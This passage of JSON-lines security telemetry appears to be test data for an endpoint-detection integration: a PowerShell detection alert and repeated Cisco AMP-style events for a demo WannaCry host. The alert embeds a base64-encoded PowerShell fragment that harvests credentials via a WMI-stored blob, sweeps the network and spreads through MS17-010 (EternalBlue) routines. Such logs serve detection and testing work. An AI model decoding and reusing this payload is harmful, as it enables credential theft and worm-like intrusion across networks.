AbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20200719101800,"sig_rev":1},"detection":"apde:20200719101800","end_ts":1610640884,"engine":"apde","id":"cF3A8bacac","name":"PowerShell Download String","observables":{"file":[{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1},{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1}]},"remediated":false,"severity":"medium","silent":true,"start_ts":1610640884,"tactics":["TA0002","TA0005"],"techniques":["T1059"],"type":"activity","normalized":{"observables":{"file":{"name":["wmiprvse.exe","powershell.exe"],"path":["c:\\windows\\system32\\wbem","c:\\windows\\system32\\windowspowershell\\v1.0"]}},"name":"powershell download string"},"ts":1610640884},"tactics":["TA0002","TA0005"],"techniques":["T1059"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":873000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 